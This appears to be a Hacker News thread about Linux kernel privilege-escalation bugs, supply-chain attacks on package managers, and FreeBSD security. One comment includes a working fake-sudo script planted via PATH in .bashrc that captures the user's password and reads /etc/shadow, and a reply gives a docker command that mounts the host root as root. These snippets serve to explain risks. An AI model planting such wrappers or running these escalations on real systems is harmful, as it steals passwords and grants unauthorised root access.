            They exploited a linear stack buffer overflow. Not a write-what-where or arb write. A linear stack buffer overflow in 2026! There are at least two distinct failures there:

            1. No strong stack protectors.

            2. No kASLR.

            That's 20-year-old exploit methodology.

  • krupan a day ago

    If you are switching to a BSD for security reasons, why FreeBSD? Isn't OpenBSD the super secure one? Sorry, it's been a while since I've looked at those projects

    • loloquwowndueo a day ago

      The person suggesting FreeBSD is a FreeBSD developer (Colin Percival - actually according to Wikipedia FreeBSD engineering lead), would be weird for him to suggest openbsd.

      • Rendello a day ago

        I'm reminded of another legendary HN thread:

        https://news.ycombinator.com/item?id=35079

        • guiambros a day ago

          Also hilarious to see Drew Houston responding a bit later on the same thread:

          > we're in a similar space -- http://www.getdropbox.com (and part of the yc summer 07 program) basically, sync and backup done right (but for windows and os x). i had the same frustrations as you with existing solutions.

          > let me know if it's something you're interested in, or if you want to chat about it sometime.

          >drew (at getdropbox.com)

        • liamwire a day ago

          It may well have been your point, but that it's the exact same person makes this even better

          • Rendello 6 hours ago

            It was, yes. I was trying to figure a way to bring it up but I didn't want to imply that the comment here was ignorant for not knowing the account. It's the opposite, HN accounts have so little fanfare and we all talk in the same threads, it's fun!

    • andai a day ago

      I haven't switched to BSD but I've been thinking about it for a while. I just saw Vultr has both FreeBSD and OpenBSD!

  • tclancy a day ago

    There’s always a guy. It’s great that your favorite distro is definitely safer. An order of magnitude fewer exploits will mean only a few thousand or so, I suppose. Ozymandis used Gentoo.

    • dag100 a day ago

      Calling FreeBSD "just a distro" is verging on insulting. It's an operating system.

      • tclancy 21 hours ago

        Apologies, "OS". I am not a native speaker of whatever place that considers these fightin' words.

      • pocksuppet 20 hours ago

        Distros are operating systems.

        • dag100 8 hours ago

          But operating systems are not distros.

          Less laconically, distros generally refer to the userland parts of the operating systems rather than the actual kernel. FreeBSD does not use the Linux kernel so calling it a distro, which typically refer specifically to Linux distros, wouldn't be accurate.

    • shakna a day ago

      Well, as they're a FreeBSD dev, I would be surprised if they pointed anyone in a different direction.

    • LoganDark a day ago

      FreeBSD is not a distro. It's not even Linux; it's a completely different kernel and operating system that traces back to even before Linux. It's honestly closer to Darwin than it is to Linux; macOS is technically a BSD. (Not FreeBSD though.)

      • steve1977 a day ago

        Darwin is its own thing really. There are parts from BSD, there are also parts from Mach and there are also unique parts.

        • LoganDark 13 hours ago

          Of course. Linux does not share any heritage with BSD though.

          • Melatonic 13 hours ago

            Except that they are both based on Unix and (generally) made to run on x86 processors. Which is a pretty big similarity

            • LoganDark 8 hours ago

              Linux is not based on Unix. AFAIK it was inspired by Unix, but does not actually share anything.

    • GalaxyNova a day ago

      FreeBSD is not a distro

      • stackghost a day ago

        What does the D in BSD stand for again?

        • tom_alexander a day ago

          That's more of a historical artifact. The BSDs started as just "BSD": a set of patches for AT&T Unix that were _distributed_ by Berkeley. Eventually the patches became complete enough to be an entire operating system. _Then_ the various BSDs that we know today (FreeBSD, OpenBSD, NetBSD, DragonflyBSD) all forked and became completely independent operating systems. For decades, FreeBSD's kernel and userland has been developed independently from the OpenBSD kernel and userland which is developed independently from NetBSD's kernel and userland, etc. You could not take an OpenBSD program and run it on FreeBSD. Even recompilation from source isn't necessarily enough since the BSDs support different syscalls.

          They are completely independent operating systems with a distant shared history.

          Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. You could take a program compiled for Debian and run it on Arch, which is common these days due to Docker where you're pulling another distro's userland and running it on your distro's kernel. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.

        • shaky-carrousel a day ago

          Distribution. Which is a different word than distro, with a different meaning. Like smart and smartass.

          • einsteinx2 a day ago

            While you’re correct that FreeBSD is not a Linux distribution, the word “distro” is literally short for distribution. It doesn’t have a different meaning like smart and smartass, it’s more like repo and repository.

        • beng-nl a day ago

          Distribution. But it’s not a Linux distribution.

  • dijit a day ago

    FreeBSD is quite lax when it comes to security- especially defaults and configs.

    The preference is for usability over security.

    Famously: https://vez.mrsk.me/freebsd-defaults

    I appreciate your work on the project, but I can’t in good conscience suggest people switch while are such bad defaults.

  • eahm a day ago

    Also funny they never show Debian in those tests/videos.

    • cperciva a day ago

      Debian is probably the best of all the Linuxes, but still suffers from split-brain: If patches are sent upstream first, Debian can't start digesting them until they're already public.

      With FreeBSD there's never any question of "who should this get reported to".

      • JoshTriplett a day ago

        > Debian can't start digesting them until they're already public

        Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.

        Is there some other aspect of this that you're referencing?

        • cperciva a day ago

          The key words there are "when they're actually coordinated". Debian doesn't own the Linux kernel, and the kernel developers don't bother with coordinated disclosure, so the happy path of coordinated disclosure only happens when reporters make the non-obvious choice of reporting vulnerabilities to people other than the maintainers.

          • JoshTriplett a day ago

            Fair enough; yeah, at the point where the embargo failed, it was important that patches get to distros as fast as possible in order to ship the fixes.

        • pavon a day ago

          The fact that the kernel security team has decided coordinating disclosure is someone else's problem so it happens inconsistently.

      • goodpoint 20 hours ago

        No, Debian has its own security team and receives embargoed vulnerabilities and patches.

    • juujian a day ago

      How so?

  • homebrewer a day ago

    Has everyone here already forgotten about the WireGuard tire fire?

    https://lwn.net/Articles/850098

    https://news.ycombinator.com/item?id=26507507

    tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.

    Was this process problem fixed?

  • f30e3dfed1c9 a day ago

    Been constructing a lot of infrastructure servers recently, almost all of them FreeBSD VMs running under bhyve on FreeBSD physical hosts. It's a very simple, clean, pleasant environment to work in. And they all run tarsnap. ;-)

  • voidUpdate 21 hours ago

    I've kept hearing about BSD recently, how hard is it to actually switch to? I'm guessing Linux executables don't work on it since it's not Linux, do all your packages have to be made specifically for BSD?

    • brewmarche 19 hours ago

      My experiences from dabbling with it a few months ago:

      In general everything needs to be compiled for FreeBSD, but the ports collection is quite extensive. For example you will find Firefox, wayland, GNOME, KDE, xfce, … even dotnet was on there.

      Problems arise with properietary stuff like Spotify, Widevine DRM etc. However, FreeBSD has a Linux emulation layer (providing syscalls), dubbed ‘Linuxulator’. I managed to run the Spotify Linux desktop client but the Spotify website wouldn’t let me log in, didn’t research further. AFAIK the emulator is limited though, not implementing all syscalls.

      There is also podman for FreeBSD and in addition to running FreeBSD containers (using Jails under the hood I guess?) it can run Linux containers as well (using the Linuxulator in addition then?).

      It also comes with a hypervisor called bhyve if you want to run VMs

      There is a handbook on their website describing how to set up a system (including desktop environment) if you want to give it a go.

    • SV_BubbleTime 19 hours ago

      If you are asking, it’s not for you.

  • ComplexSystems a day ago

    While I am sure FreeBSD is more secure than your average Linux distro, I sure hope they are using these new AI models to harden everything.

  • pjmlp a day ago

    Only to be thrown out of the windows with a plain "curl | sh".

    • skydhash a day ago

      curl | sh is more prevalent in Linux where you can expect a stable ABI from the kernel and sometimes GNU libc. No such things in BSD land. Packages are built against a release always. They don't maintain binary compatibility.

      • pjmlp a day ago

        Hardly an argument against random shell scripts execution, quite often elevated.

        Not everyone installs only what is available in pkgsrc.

  • bananamogul a day ago

    FreeBSD just slaps at the problem. OpenBSD solves it.

    I kid, I kid...

AgentME a day ago

There's already an okay solution to supply-chain attacks against dependency managers like npm, PyPI, and Cargo: set them to only install package versions that are more than a few days old. The recent high-profile attacks were all caught and rolled back within a day, so doing this would have let you safely avoid the attacks. It really should be the default behavior. Let self-selected beta testers and security scanner companies try out the newest versions of packages for a day before you try them. Instructions: https://cooldowns.dev/

  • edoceo a day ago

    More a case for something like this from Show HN three months ago

    https://github.com/artifact-keeper

    An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.

    I had my own janky tooling for something like it. This is a good project.

    • Johnny555 a day ago

      Does that really scale well? Thanks to cascading dependencies, even a medium sized project can import hundreds of dependencies. Can a developer really review them all to figure out if they are safe and that there's not security fix that was fixed in a newer version of the package?

      • jpollock a day ago

        Yes, that is what is required. Every dependency needs an internal owner and reviewer. Every change needs to be reviewed and brought into the internal repository.

        If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?

        It's a software engineering version of the professional engineering stamp.

      • edoceo a day ago

        I love the sibling response from @jp...

        Also, IME we don't deep dive everything (should we?)

        For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.

  • pjmlp a day ago

    Even better, only use company vetted repos, everyone is forbidded to install directly from the Internet repos.

    This naturally doesn't work outside corporations.

    • ric2b 11 hours ago

      That usually ends up as proxies to the upstream repos, because the people managing the company repos don't have time to review every new version of a package.

      At that point you're just as vulnerable to a supply chain attack.

  • b112 a day ago

    So you get security updates late too? Many vulnerabilities are in the wild for years before being noticed, and patched.

    Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.

    • AgentME a day ago

      Presumably npm exempts security updates from its minimum release age, but even if it doesn't, I think the times where you need an important security update are relatively rare enough that handling the real cases on a case-by-case basis with whitelisting is fine. Outside of Next.js's React2Shell vulnerability last year, I'm not sure I've ever had a security update of a dependency written in a memory-safe language (ie. not C/C++) which I've installed through npm/PyPI/Cargo that patched a security vulnerability that had been making my application exploitable to others in practice. Almost all security vulnerabilities I've personally seen flagged through npm are about things I only use at build-time and are only relevant if a user can create and pass an arbitrary object to the function, which is rarely the case. Most security vulnerabilities I've encountered and fixed in working on web apps were things like XSS, SQL injections, and improperly enforced permissions, and they nearly always happened in the application's own code rather than inside a dependency.

      • wavemode a day ago

        > exempts security updates from its minimum release age

        If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".

      • mattstir 21 hours ago

        > Presumably npm exempts security updates from its minimum release age

        Why would it? Then an attacker would just push compromised code as a "security update". Since the majority of these npm attacks are account-based, the attacker can do everything the actual owner could.

    • ayuhito a day ago

      At least with our Renovate config, all dependencies have a 7 day cooldown, but marked security updates are immediate.

      Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.

    • ketozhang a day ago

      You could still have security bumps happening (like dependabot).

  • skydhash a day ago

    IMO, the most sustainable version is either the linux distros/bsd ports/homebrew models. You don't push new libraries to the public registry, instead you write a packaging script that gets reviewed for every new changes.

    Another model is Perl's CPAN where you publish source files only.

    • microtonal a day ago

      Trust me, as someone who has contributed to such a package set, almost nobody is inspecting diffs between upstream versions when updating a package. Only the package definitions themselves are reviewed, but they are typically only version + hash bumps.

      Reviewing upstream diffs for every package requires a lot of man hours and most packagers are volunteers. I guess LLMs might help catching some obvious cases.

      • skydhash a day ago

        Not really talking about upstream. Most supply attacks I’ve heard about are stolen secrets and artifacts uploading. They’re not about repositories or websites being taken over. As the packaging scripts are often in repos, you detect easily if people are trying to update where upstream points to.

XCabbage a day ago

Sorry, I don't get it. What's the chain of reasoning that connects "there are a couple of new Linux local privilege escalation exploits" to "don't install any new software"? Is the threat we're supposed to be concerned about here just a package maintainer publishing malware that uses these exploits?

(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)

  • roskilli a day ago

    Well one thing is, there are package updates that could masquerade a backdoor much like XZ Utils[1].

    The post in question points to dependency package managers however not system packages, such as NPM, which has pre and post build scripts, install scripts, etc.

    [1] https://en.wikipedia.org/wiki/XZ_Utils_backdoor

anymouse123456 a day ago

For the newer players who have gotten into continuous integration and containerized builds, consider checking on your systems to be sure you're not pulling 'latest' across a bunch of packages with every build.

We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.

This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.

mastermage a day ago

I think what we have to start accepting even security experts is that our world is incredibly fragile. I think people realy understimate this. And I do not mean just the IT world but the entire world is built on many incredibly fragile balances. Security Exploits will always exist. Not just in software but in real life. Heck someone managed to Sneak into a Security Conference. And that guy was a random youtuber. Granted that was not like a high security thing. But thats just an example I had of the top of my head. Basically it is realy easy to circumvent security in most cases.

What I want to say with that is fundamentally our world works because atleast most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to do so.

  • kaelyx a day ago

    I remember there was a trend with some UK Influencers using some "Ladder and a High-vis" tricks to enter places for a while to show how rough physical security is [0]. I believe its the youtuber, Max Fosh, who managed to do it back to back at the International Security Expo, first in the UK [1] and then in the US [2], with the fake names 'Rob Banks' and 'Nick Everything'.

    I've studied security culture before and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other, the more secure something is, the less accessible it is and vice versa.

    [0] https://www.youtube.com/watch?v=LTI0SeyhAPA

    [1] https://www.youtube.com/watch?v=qM3imMiERdU

    [2] https://www.youtube.com/watch?v=NmgLwxK8TvA

sergeykish a day ago

Linux distributions do not need Copy Fail to get root access:

    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc

    mkdir -p .local/bin/
    cat <<EOF >.local/bin/sudo
    read -rs -p "[sudo] password for $USER: " PASSWORD
    echo ""
    echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
    EOF

    chmod +x .local/bin/sudo
attack on next sudo call, shows data accessible only to root.

Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
long term environments defined in docker compose:

    $ docker-compose.yml
    services:
      app:
        image: node:alpine
        volumes:
          - .:/app
        working_dir: /app
        command: /bin/sh
    $ docker compose run app
switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.
  • kro 21 hours ago

    These copyfail exploits allow an unprivileged (daemon/app) user (not in sudoers) to get root without interaction from the original system maintainer.

    It's quite different from PATH-injecting an already privileged user.

    Also, these memory corruptions can likely be used as container escape primitives too. Albeit not easily.

    It's a serious break of a security boundary. Yes, container layer adds defense, and normal unix security isn't perfect, but it should not allow this.

  • quectophoton a day ago

    If `docker` is already there, why even bother with `sudo` when you can just:

        docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
    
    Chances are that the person who set up Docker didn't do it properly.
    • sergeykish 21 hours ago

      Run in docker container:

          $ docker run -it -v.:/app -w /app node:alpine /bin/sh
          /app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
          /bin/sh: docker: not found
      
      I've described attack from host user and isolating attacker with docker.
  • harrouet 20 hours ago

    Containerizing every app is what iOS / iPadOS already do.

    It is regularly pointed out as a drawback by Android users (e.g. "I can't run that doomscrolling blocker in iOS"), but from a security-model perspective it was visionary back in 2008.

andai a day ago

Can someone help me understand the copyfail thing and how it relates to NPM packages?

Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?

So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.

And the advice isn't just "update your kernel" because we are still finding new related issues?

  • ahpeeyem a day ago

    NPM supply-chain attacks spread really quickly.

    If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.

  • Gigachad a day ago

    The patches for the latest vulnerabilities aren’t even out yet. So it would be a real bad time for a new supply chain attack since it would get root on pretty much every system.

  • wavemode a day ago

    > And the advice isn't just "update your kernel" because we are still finding new related issues?

    The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.

  • xena a day ago

    npm can run on linux.

abustamam 18 hours ago

This advice is good even if there weren't security vulnerabilities. When I was a junior engineer I'd install a bunch of packages just willy nilly. My manager was like "stop installing packages for simple things. Just learn how they work and code it yourself."

I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.

Animats a day ago

I'm holding off on upgrading to Ubuntu 26.04 LTS until we have a few months of experience with the new release. Canonical just had a huge DDOS attack, and there might have been other attacks hidden in all that traffic.

antonyh a day ago

"Don't update your systems for a while" is exactly what an attacker would say.

If you can't trust your update sources, you have bigger problems.

  • moffkalast a day ago

    If I'm being really frank, are system updates not more disruptive, destructive and result in more data loss and downtime than all the attacks you'll experience in your lifetime? (unless you're a high value business target ofc, I'm talking for personal machines)

    In my book, having unattended-upgrades or windows update run amok on your system is functionally worse than a rootkit.

    • Melatonic 13 hours ago

      This is why you always have a test environment and good, tested backups that are easy and quick to roll back to. Even if something makes it past test (or there is an install problem with a patch that is otherwise fine) you can just roll back.

      For personal machines without those resources you are a bit of a hard place - although many OS and software these days have long term stable versions and the ability to defer auto patches by a week or two

    • antonyh a day ago

      This. Lost hours from the hours running the updates, lost hours from the occasional faulty upgrade, and every now and again it's fail spectacularly and need a restore from backup to return to productivity. No matter if it's Ubuntu LTS or non-LTS, every six months there's always something radically changed. OpenSUSE Leap has the same problem. I'm looking at Tumbleweed but a new version every week is going to break occasionally. Gentoo build-from-source is going to have weirdness every now and again, if not utter ruin. MacOS updates yearly, and brings horrors with every point zero release. Windows is Windows, and those problems are well known. I don't think there's a way around it with the current offerings.

      It's a problem we have to live with for the sake of progress and for security updates. Every machine needs downtime for maintenance on a periodic, often-scheduled basis. It might cost time but avoiding updates is not a good plan.

      Aside from dodgy updates that have to run as root to install, if you have passwordless sudo it's more dangerous than any broken package or local-only privilege escalation exploit. I'll wager many have it set up that way, because typing passwords is tiresome.

metaengies a day ago

Actively destructive opinion article. I could not begin to understand the rationale.

It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are. Which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far as 2017.

It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.

  • smallpipe a day ago

    OP is suggesting that a supply chain attack would be bad now, and to reduce that risk by not installing/updating NPM packages.

  • pocksuppet 20 hours ago

    FYI copyfail and dirtyfrag are the same vulnerability activated by two different code paths.

    It's as if Windows had a vulnerability triggered by writing a certain string to a file. Copyfail is to write the string to a file. Dirtyfrag is to get another program to write the string to a file. When you fix the vulnerability - make sure nothing strange happens when the string is written - both go away at the same time.

cbarnes99 a day ago

It really pisses me off that responsible disclosure timelines are being ignored.

  • creatonez a day ago

    In this case, no insiders broke the embargo. It was reverse engineered from the patch by an unrelated third party and a proof of concept immediately came out of it. At that point, it's kinda fair game.

    • vintermann a day ago

      I assume that while Mythos may be really good at finding vulnerabilities, lighter models may still do a pretty good job of explaining/exploiting the vulnerability if given the patch which fixes it.

      • mattstir 21 hours ago

        Maintainers attempt to reduce the likelihood of that somewhat by giving security patches boring-sounding commit messages. When there are thousands of patches for every kernel release to sift through, that adds a small barrier for would-be exploiters.

    • CodesInChaos 20 hours ago

      Aren't patches usually covered by the embargo as well, and kept private until the deadline?

      • creatonez 18 hours ago

        For proprietary software, sure. But open source projects rarely ever work like this.

        Especially for a project like the kernel, there's no reasonable way to decide who out of thousands of interested parties should have access first.

        Android is a rare exception, as of a few years ago they started a program where phone manufacturers get very favorable early access to AOSP code 4 months ahead of public release.

  • bellowsgulch a day ago

    if you don't already consider responsible disclosure a quaint idea, you may want to grow warm on it

    the idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway

    • Root_Denied a day ago

      Less a gentleman's agreement and more of a question of economic incentives going away. Companies aren't paying out bounties at the rates they used to (possibly because they've realized there's little financial incentive to do so for most findings) and simultaneously they're being inundated with AI slop findings that somehow have to still be triaged and evaluated.

  • roxolotl a day ago

    The dirty frag repo says:

    > Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.

    I had to do a double take reading that. It’s written something happened and prevented them from following a schedule but seemingly they chose to release the information. I hope I’m missing something where it was forcibly disclosed elsewhere.

    Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers

  • zmj a day ago

    If the fix commit is public, so is the issue being fixed.

    • jeroenhd a day ago

      With copy.fail the security patch wasn't listed as such so there wasn't a lot of attention on the issue as it remained dormant in most kernels for a while.

      I don't doubt that the patch reversal + exploit PoC made by a third party is the result of people figuring out how patches work in open source projects like these.

      Anyone with access to a good enough LLM can scour through supposedly minor bug fixes that might hide a critical vulnerability rather than doing it all manually. The LLM will probably throw up tons of false positives and miss half the issues, it you only need one or two successes.

rablackburn a day ago

Literally implemented PR guards today to prevent the team merging any dependencies that didn’t have explicit versions pinned (and that matched the resolution in the lock file).

People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.

Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.

  • clbrmbr a day ago

    Wouldn’t you prefer to pin to SHA hashes? Or does your package manager cloud-side ensure immutability of releases?

fkarg a day ago

the lottery of either getting a new supply-chain attack or the fixes from Mythos with every single update

golem14 a day ago

This gets me to ask whether I have been hacked . For a few weeks now, both my main mbp and iPhone have been showing unexpected hangs of 1-30 seconds. I can’t find out what’s causing it - not memory pressure, not cpu load.

I am worried that the sluggishness appeared about the same time on both devices

  • Gigachad a day ago

    For ios, rebooting your phone is extremely effective at removing exploits. The boot chain attestation stuff can verify the system is in a known state. If you are ultra paranoid you could enable lockdown mode which preemptively disables the entrypoints for exploits. So far I don't believe there has been any exploit which works with lockdown mode enabled.

    • Georgelemental a day ago

      If you are already exploited though, I doubt it helps

      • jeroenhd a day ago

        Getting persistent root is actually quite difficult on mobile operating systems. iOS famously so, but unless you're running a custom ROM other than Graphene, Android has some solid protections as well.

        Regular phone reboots are a security measure at this point.

      • Gigachad a day ago

        It does though, the exploit exists in memory. When you reboot the phone the memory is reset, if it's modified system files, the checksums won't pass and your phone will refuse to boot. Requiring it to be wiped and reinstalled.

        These days most exploits can not persist through a reboot due to secureboot and other bootchain attestations. In the boot process, everything loaded gets checksummed and compared to signed signatures from Apple, but this only helps at load time, not while the phone is running. Of course if the phone is not patched, the exploit could be reloaded, but this would require revising a malicious website or reopening a malicious bit of media.

Melatonic 13 hours ago

This is why I usually try to lean toward software versions with LTS (Long Term Stable) versions - especially if they are more minimalist / run leaner. Theoretically you get all the security patches (if needed - of course you can vet updates still and test) and less bugs and vulnerabilities through less new features.

Reducing attack surface and software complexity will (theoretically) reduce the number of possible exploits regardless of what new tool or process attackers discover.

KevinMS a day ago

I got rid of half of my VSCode extensions a couple days ago, its too risky.

  • BobbyTables2 a day ago

    Those things scare the crap out of me…

    Even worse are the “extension packs” that combine some normal things and one wonky thing nobody’s ever heard of…

hn_throwaway_99 18 hours ago

I always wondered why it wasn't super easy to have a version specification in NPM that basically said "give me the latest version of this dependency as of X weeks ago". That is, hijacked modules usually were revealed within a week, and there are some groups (like security researchers) that are fine with being on the bleeding edge, but a lot of more conservative companies would rather hold back a week or two.

I know there are extensions and proxies you can set up that do this, but it just seems like it should be built in to NPM directly (maybe it has, I haven't been up on Node programming in the last couple years).

asdfman123 15 hours ago

Genuine question: I wonder if AI coding is responsible for the new exploits coming to light.

AI coding is great at is helping you try out things you wouldn't have the time or energy to normally do. It shines for writing scripts that aren't part of a larger codebase, and helping with boring, rote tasks.

Hackers are also very motivated to use new tools to find any kind of opening (unlike normal devs who aren't always as... motivated :).

femiagbabiaka a day ago

Yes, and, for non-personal machines or anything connected to the internet: now is a great time to get good at rolling out patches and new releases quickly.

  • Gigachad a day ago

    The proof of concept code is out before patches are available for any distro.

    • femiagbabiaka 20 hours ago

      Perhaps it's time to switch to paradigms that allow faster patch generation, application, and rollout... like Nix.

giwook 19 hours ago

I installed LuLu recently and it's been nice to have that extra peace of mind. Obviously it's not a silver bullet, but it is a nice tool to have as part of a broader defensive, preventative posture.

I'm not associated with the project in any way and am very much open to other suggestions, either as an alternative to LuLu or to complement it.

https://objective-see.org/products/lulu.html

1a527dd5 a day ago

This applies to much more than just software, in fact it applies to almost everything.

I don't remember where I read it, but it basically boils down to need vs want.

I've used that rule for deciding between a new car or used. A fancy vacuum or basic.

A shiny new gadget.

Bringing new things into the tech stack.

Picking a new tech stack.

leonidasv a day ago

The post is about Linux vulnerabilities, but given the recent supply chain attacks, I'd be especially careful with Homebrew: https://x.com/i/status/2052106143271354859

  • nomilk a day ago

    Often convenience and security are at odds, but `export HOMEBREW_NO_AUTO_UPDATE=1` is more convenient and more secure.

    • cromka a day ago

      Problem here is Brew does things in an anti-unix way by default, the auto updating of packages being the prominent reason.

      I personally switched away from macOS with this being one of the reasons, after having realized brew will eventually compromise my system with their antics.

moebrowne a day ago

For anyone who is running an out-of-support version of Ubuntu (Ubuntu 20 and lower) I highly recommend Ubuntu Pro it gives access to updates and is free for personal use

mghackerlady 20 hours ago

Or, just install OpenBSD or (or FreeBSD if you're willing to sacrifice a chunk of security for nvidia, jails, and bhyve)

happyPersonR 16 hours ago

With mandatory auto updates and software that don’t pin dependencies being the norm, most of us have no choice in the matter really.

We’re not downloading new firmware and installing for a lot of things it’s all getting pulled in automatically.

looneysquash 18 hours ago

That sounds like it wouldn't scale. If everyone did it, then it would just delay things.

  • abustamam 18 hours ago

    True, but not everyone will do it. The intention isn't to scale, it's to save your own ass.

mobeigi a day ago

I saw a recent post about only adopting packages a certain number of days post release (say +3 days, or +7 days) after. The idea is you never bring in fresh commits, only older ones. This would need dangerous or bad commits to be marked vulnerable too.

It means you skip supply chain attacks but may miss fresh vulnerability patches too.

  • mattstir 20 hours ago

    You only miss supply chain attacks that are eager to begin exploiting. If everyone begins waiting a week to update dependencies, attackers just need to wait 2 weeks before actively using their attack vectors.

clbrmbr a day ago

So what do we do? Pin our dependencies (to hashes when possible), and only update when there are CVEs?

But problem is this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?

  • papichulo2023 a day ago

    Run everything as sudo so they cant escalate any further ;)

    • clbrmbr a day ago

      Do you know if this exploit works on Docker containers? And if so, I assume it just allows escalation WITHIN the container? So this attack is scary for Linux desktops and servers, but a fully containerized system like common on CI/CD should be good. Right?

  • throawayonthe a day ago

    Nothing :D

tjansen a day ago

I wonder whether there is any tool that can prevent npm from downloading any package that has been published in the last month. While I miss out on possible fixes, this would prevent downloading some 3rd level dep that takes over my machine.

yurug a day ago

At some point, some people will rebuild an entire stack (all layers, from OS to applications) with proof carrying code upgrades. Proof-code co-design and co-construction is the only way to execute code that you can trust.

alecco a day ago

Or disable algif_aead module as in https://news.ycombinator.com/item?id=47957409

mtam 20 hours ago

Genuinely curious why are tools like ChainGuard not more prevalent? I am sure there open source alternatives for it too.

junto 16 hours ago

Reminds me of the old adage “I don’t need to outrun the bear. I just need to outrun you.”

Once everyone takes the stance of waiting 2 weeks, we are all back to the same situation.

I don’t like the suggestion to “wait for others to be the unfortunate victims, so that I can benefit from their misfortune”.

Surely there’s a better way.

vga1 a day ago

Maybe you should install new kernels at least though.

dzonga 16 hours ago

instead of using downloading software via npm (in case of your computer being taken over

there's a secure option provided by the web - no build - scripts at the top / bottom of the page

they're executed in a secure sandbox

Schlagbohrer 13 hours ago

I juuuuuust updated npm, should i be worried?

pjmlp a day ago

Remember the whole discussion when UNIX was supposed to not need anti-virus and talking down PCs?

Behaviours matter more than OS security primitives.

  • jeroenhd a day ago

    The whole (mistaken) belief that Linux and macOS didn't require AV was based on the execute bit being present, something Microsoft fixed back in XP by making downloaded files as such and preventing them from being opened trivially.

    If you have code execution, you can attack the OS.

    • pjmlp a day ago

      Indeed, when one installs dependencies all over the Internet, or even better, key projects use "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh" as default suggestion on how to install them, attackers have the work done for them.

      • 1718627440 a day ago

        > key projects use "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh" as default suggestion

        This is exactly why some (including me) don't take these projects seriously. Like you claim to design a language for security, and this is how you tell me to install it????

        • TeamDman 21 hours ago

          What alternative do you propose for downloading binaries off the internet, placing them in the "right spot" and doing post-install operations like updating PATH that dont have gotchas equivalent to running "untrusted" code like curl|sh?

          • 1718627440 20 hours ago

            The one that is the norm on Linux distros and on nearly all mobile OSs: signed packages. 'curl | sh' doesn't even allow to observe the package while or after installing.

        • pocksuppet 20 hours ago

          Downloading some code from the internet and running it is a very normal way to install software.

          curl|sh has the truncated shell script concern. It's possible to mitigate this concern. Did they? If so, it's no different from downloading and running any other installer.

thot_experiment a day ago

Speaking of, LTT posted a video about DDR pad, which triggered the sleeper cell programming of my youth and I opened up StepMania to play a few rounds. I was shutting down the program and I noticed the build info in the corner.

6-19-2005

My copy of StepMania is turning old enough to drink in like a month and it's still fantastic, software updates are (mostly) a scam.

eskibars a day ago

"If it ain't broke, don't fix it" is its own area of risk that people often ignore

  • creesch a day ago

    Except that a lot of software likely is already broken in fun ways we currently don't know about. That is what makes it such a "fun" challenge. Supply chain attacks are one thing, but CVEs in already released software allowing other attackers are another.

    As always, I know most of us work in IT, but things rarely are actually binary.

chubs a day ago

To mitigate supply chain attacks like this, I've taken to specifying exact versions in my Rust cargo.toml, and when importing new crates, select the previous-to-latest version. Is this a reasonable mitigation? It bugs me that Swift deprecates the concept of specifying exact versions, it actively pushes you towards semver which leaves the door open to this.

  • mattstir 20 hours ago

    > select the previous-to-latest version

    For supply chain attacks that simply bide their time, or for dependencies which involve interacting with other subsystems, it's possible you miss a critical security update by doing this. Of course, the maintainers of the crates should yank known bad releases, but that's putting trust in a third-party that may have already been compromised.

  • kam 20 hours ago

    Cargo will still pick the latest for transitive dependencies that aren't explicitly specified in your Cargo.toml. This is what Cargo.lock is for.

grey-area a day ago

Alternatively, maybe you shouldn’t have so many dependencies.

xbar a day ago

It seems like this round of vulns is going to be significant. What is the right response?

  • Gigachad a day ago

    Personally I'm choosing to keep my home server behind a VPN and to enable Lockdown Mode on my phone and laptop for a while until the dust settles. As well as just limiting the software installed to trusted projects only.

    VM isolation would still be safe even with these kernel exploits.

harrouet 20 hours ago

